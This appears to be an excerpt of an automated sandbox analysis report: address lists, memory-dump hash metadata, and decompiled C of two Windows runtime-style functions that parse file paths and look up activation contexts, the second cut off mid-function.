0x05496067
0x0549606a
0x05496070
0x05496075
0x05496076
0x05496081
0x05496087
0x05496095
0x05496099
0x0549609e
0x054960a4
0x054960ae
0x054960b0
0x054960b3
0x054960b6
0x054960b8
0x054960ba
0x054960ba
0x054960ba
0x054960ba
0x054960be
0x054960c0
0x054960c5
0x054960c5
0x054960c5
0x054960c6
0x054960cd
0x05496114
0x054960cf
0x054960cf
0x054960d4
0x054960d5
0x054960da
0x054960db
0x054960e1
0x054960e2
0x054960e8
0x054960f8
0x054960fd
0x054960fe
0x05496102
0x05496104
0x05496107
0x05496109
0x0549610b
0x0549610b
0x0549610b
0x0549610b
0x0549610f
0x0549610f
0x05496117
0x0549611a
0x0549611f
0x05496125
0x05496134
0x05496139
0x0549613f
0x05496146
0x05496148
0x0549614b
0x0549614d
0x0549614f
0x0549614f
0x0549614f
0x0549614f
0x05496153
0x05496159
0x05496159
0x0549615c
0x05496163
0x05496169
0x0549616c
0x05496172
0x05496181
0x05496186
0x05496187
0x0549618b
0x05496191
0x05496195
0x054961a3
0x054961bb
0x054961c0
0x054961c3
0x054961cc
0x054961d0
0x054961dc
0x054961de
0x054961e1
0x054961e4
0x054961e6
0x054961e8
0x054961e8
0x054961e8
0x054961e8
0x054961e6
0x054961ec
0x054961f3
0x05496203
0x05496209
0x0549620a
0x05496216
0x0549621d
0x05496227
0x05496241
0x05496246
0x0549624c
0x05496257
0x05496259
0x0549625c
0x0549625e
0x05496260
0x05496260
0x05496260
0x05496260
0x0549625e
0x05496264
0x05496267
0x05496269
0x05496315
0x05496315
0x0549631b
0x0549631e
0x05496324
0x05496327
0x0549632f
0x05496330
0x05496333
0x0549633a
0x0549633c
0x05496335
0x05496335
0x05496335
0x0549633f
0x05496342
0x0549634c
0x05496352
0x05496355
0x05496355
0x05496359
0x00000000
0x0549626f
0x05496275
0x05496275
0x05496278
0x0549627e
0x0549627e
0x05496281
0x05496287
0x0549628d
0x05496298
0x0549629c
0x054962a2
0x0549629e
0x0549629e
0x0549629e
0x054962a7
0x054962a7
0x054962aa
0x054962b0
0x054962f0
0x054962f0
0x054962f2
0x054962f8
0x054962fd
0x054962b2
0x054962b2
0x054962b2
0x054962b5
0x054962dd
0x054962e2
0x054962e5
0x054962b7
0x054962b8
0x054962bb
0x054962bd
0x054962c0
0x054962c4
0x054962cd
0x054962cd
0x054962c0
0x054962bb
0x054962b5
0x05496302
0x05496303
0x05496305
0x05496305
0x05496305
0x0549630c
0x0549630c
0x00000000
0x0549627e
0x05496269
0x05495eac
0x05495ebb
0x05495ebe
0x05495ecb
0x05495ecb
0x05495ece
0x05495ece
0x05495ed4
0x05495ed7
0x05495ed9
0x05495edb
0x05495edb
0x05495ee1
0x05495ee1
0x05495ee3
0x05495f20
0x05495f20
0x05495ee5
0x05495ee5
0x05495ee5
0x05495ee8
0x05495f11
0x05495f18
0x05495eea
0x05495eea
0x05495eed
0x05495ef2
0x05495ef8
0x05495efb
0x05495f0a
0x05495f0a
0x05495eed
0x05495ee8
0x05495f22
0x05495f28
0x00000000
0x00000000
0x05495f30
0x05495f31
0x05495f37
0x05495f3a
0x05495f3d
0x05495f44
0x00000000
0x00000000
0x00000000
0x05495f46
0x05495f48
0x05495f4d
0x00000000
0x05495f4d
0x05495dda
0x05495ddf
0x00000000
0x05495ddf
0x05495dd8
0x05495da7
0x05495da9
0x05495dac
0x05495dae
0x00000000
0x05495db4
0x05495db4
0x00000000
0x05495db4
0x05495dae
0x05495d88
0x05495d8d
0x05496363
0x05496369
0x0549636a
0x05496370
0x05496372
0x0549637a
0x0549637b
0x0549637d
0x00000000
0x00000000
0x0549637f
0x05496385
0x00000000
0x05496385
0x05495d38
0x05495d3b
0x00000000
0x00000000
0x00000000
0x05495d3b
0x05495d27
0x05495d29
0x00000000
0x00000000
0x00000000
0x05496360
0x00000000
0x05496360
0x05495c10
0x05495c10
0x054963da
0x054963e5
0x054963e5

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c05433dcaf61c369d6c755f7f700b7374bc562269ae0ece5a001ccc9b182c1
Instruction ID: 0fb0a3983521906544acd1c326863a52fee9bb5121edb5822f072d5b524300ec
Opcode Fuzzy Hash: 95c05433dcaf61c369d6c755f7f700b7374bc562269ae0ece5a001ccc9b182c1
Instruction Fuzzy Hash: 56423971A042298FDF29CF68C881BEABBB1BF45304F1581EAD94DAB342D7749985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 053E4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E053E4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x54bd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E053FF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E053E6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L053E4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E053E6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M053E45F8))) {
												case 0:
													_v568 = 0x53a1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x53a11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L053E4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0540F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0540F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E053C52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E053DEB70(1, 0x54b79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E053DAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E054095D0();
																			L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0540B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E05403D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0540B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x053e4128
0x053e4135
0x053e413c
0x053e4141
0x053e4145
0x053e4147
0x053e414e
0x053e4151
0x053e4159
0x053e415c
0x053e4160
0x053e4164
0x053e4168
0x053e416c
0x053e417f
0x053e4181
0x053e446a
0x053e446a
0x053e418c
0x053e4195
0x053e4199
0x053e4432
0x053e4439
0x053e443d
0x053e4442
0x053e4447
0x00000000
0x053e419f
0x053e41a3
0x053e41b1
0x053e41b9
0x053e41bd
0x053e45db
0x053e45db
0x00000000
0x053e41c3
0x053e41c3
0x053e41ce
0x053e41d4
0x0542e138
0x0542e13e
0x0542e169
0x0542e16d
0x0542e19e
0x0542e16f
0x0542e16f
0x0542e175
0x0542e179
0x0542e18f
0x0542e193
0x00000000
0x0542e199
0x00000000
0x0542e199
0x0542e193
0x00000000
0x00000000
0x00000000
0x053e41da
0x053e41da
0x053e41df
0x053e41e4
0x053e41ec
0x053e4203
0x053e4207
0x0542e1fd
0x053e4222
0x053e4226
0x0542e1f3
0x0542e1f3
0x053e422c
0x053e422c
0x053e4233
0x0542e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x053e4239
0x053e4239
0x053e4239
0x053e4239
0x053e4233
0x053e4226
0x053e41ee
0x053e41ee
0x053e41f4
0x053e4575
0x0542e1b1
0x0542e1b1
0x00000000
0x053e457b
0x053e457b
0x053e4582
0x0542e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x053e4588
0x053e4588
0x053e458c
0x0542e1c4
0x0542e1c4
0x00000000
0x053e4592
0x053e4592
0x053e4599
0x0542e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x053e459f
0x053e459f
0x053e45a3
0x0542e1d7
0x0542e1e4
0x00000000
0x053e45a9
0x053e45a9
0x053e45b0
0x0542e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x053e45b6
0x053e45b6
0x053e45b6
0x00000000
0x053e45b6
0x053e45b0
0x053e45a3
0x053e4599
0x053e458c
0x053e4582
0x00000000
0x00000000
0x00000000
0x00000000
0x053e41f4
0x053e423e
0x053e4241
0x053e45c0
0x053e45c4
0x00000000
0x053e45ca
0x053e45ca
0x00000000
0x0542e207
0x0542e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x053e45d1
0x00000000
0x00000000
0x053e45ca
0x00000000
0x053e4247
0x053e4247
0x053e4247
0x053e4249
0x053e4249
0x053e4249
0x053e4251
0x053e4251
0x053e4257
0x053e425f
0x053e426e
0x053e4270
0x053e427a
0x0542e219
0x0542e219
0x053e4280
0x053e4282
0x053e4456
0x053e45ea
0x00000000
0x053e45f0
0x0542e223
0x00000000
0x0542e223
0x053e445c
0x053e445c
0x00000000
0x053e445c
0x00000000
0x053e4288
0x053e428c
0x0542e298
0x053e4292
0x053e4292
0x053e429e
0x053e42a3
0x053e42a7
0x053e42ac
0x0542e22d
0x053e42b2
0x053e42b2
0x053e42b9
0x053e42bc
0x053e42c2
0x053e42ca
0x053e42cd
0x053e42cd
0x053e42d4
0x053e433f
0x053e433f
0x053e42d6
0x053e42d6
0x053e42d9
0x053e42dd
0x053e42eb
0x0542e23a
0x053e42f1
0x053e4305
0x053e430d
0x053e4315
0x053e4318
0x053e431f
0x053e4322
0x053e432e
0x053e433b
0x053e433b
0x00000000
0x053e432e
0x053e42eb
0x053e434c
0x053e434e
0x053e4352
0x053e4359
0x053e435e
0x053e4361
0x053e436e
0x053e438a
0x053e438e
0x053e4396
0x053e439e
0x053e43a1
0x053e43ad
0x053e43bb
0x053e43bb
0x053e43ad
0x053e436e
0x053e43bf
0x053e43c5
0x053e4463
0x053e4463
0x053e43ce
0x053e43d5
0x053e43d9
0x053e43df
0x053e4475
0x053e4479
0x053e4491
0x053e4491
0x053e4479
0x053e43e5
0x053e43eb
0x053e43f4
0x053e43f6
0x053e43f9
0x053e43fc
0x053e43ff
0x053e44e8
0x053e44ed
0x053e44f3
0x0542e247
0x00000000
0x053e44f9
0x053e4504
0x053e4508
0x053e450f
0x0542e269
0x00000000
0x053e4515
0x053e4519
0x053e4531
0x053e4534
0x053e4537
0x053e453e
0x053e4541
0x053e454a
0x0542e255
0x0542e255
0x0542e25b
0x0542e25e
0x0542e261
0x0542e261
0x053e4555
0x053e4559
0x053e455d
0x0542e26d
0x0542e270
0x0542e274
0x0542e27a
0x0542e27d
0x0542e28e
0x0542e28e
0x053e4563
0x053e4563
0x053e4569
0x053e4569
0x00000000
0x053e455d
0x053e450f
0x00000000
0x053e44f3
0x053e43ff
0x053e4405
0x053e4405
0x053e4405
0x053e42ac
0x053e428c
0x053e4282
0x053e4407
0x053e440d
0x0542e2af
0x0542e2af
0x053e4413
0x053e4413
0x00000000
0x053e41d4
0x00000000
0x053e41c3
0x053e41bd
0x053e4415
0x053e4415
0x053e4416
0x053e4417
0x053e4429
0x053e416e
0x053e416e
0x053e4175
0x053e4498
0x053e449f
0x0542e12d
0x00000000
0x0542e133
0x00000000
0x0542e133
0x053e44a5
0x053e44a5
0x053e44aa
0x00000000
0x053e44bb
0x053e44ca
0x053e44d6
0x053e44d7
0x053e44d8
0x053e44e3
0x053e44e3
0x053e44aa
0x053e417b
0x053e417b
0x053e417b
0x00000000
0x053e417b
0x053e4175
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72814b780e1e2418493c7473f84ba291d774595d0cc197b5c60e8dd81adc8296
Instruction ID: adcad84389bd4c2805d3708aab7fbd73277795a4b4db0637fea8a5323c92d3cf
Opcode Fuzzy Hash: 72814b780e1e2418493c7473f84ba291d774595d0cc197b5c60e8dd81adc8296
Instruction Fuzzy Hash: AFF18E706083218BCB24CF59C484A7AB7E6FF88704F55496EF886CB790E774D991CB52

Uniqueness

Uniqueness Score: -1.00%

Function 053F20A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E053F20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x54b8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E053F2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E053F2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E053C58EC(_t240);
									_t221 =  *0x54b5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x54b5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E05404A2C(0x54b6e40, 0x5404b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E053E7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x53a5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E053FF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E053FF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E05447016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L053E2400(_t267 + 0x20);
															}
															L053E2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E053F2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E053E2280(_t134, 0x54b8608);
									__eflags =  *0x54b6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E053DFFB0(_t198, _t241, 0x54b8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x54b6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x54b8608; // 0x0
								while(1) {
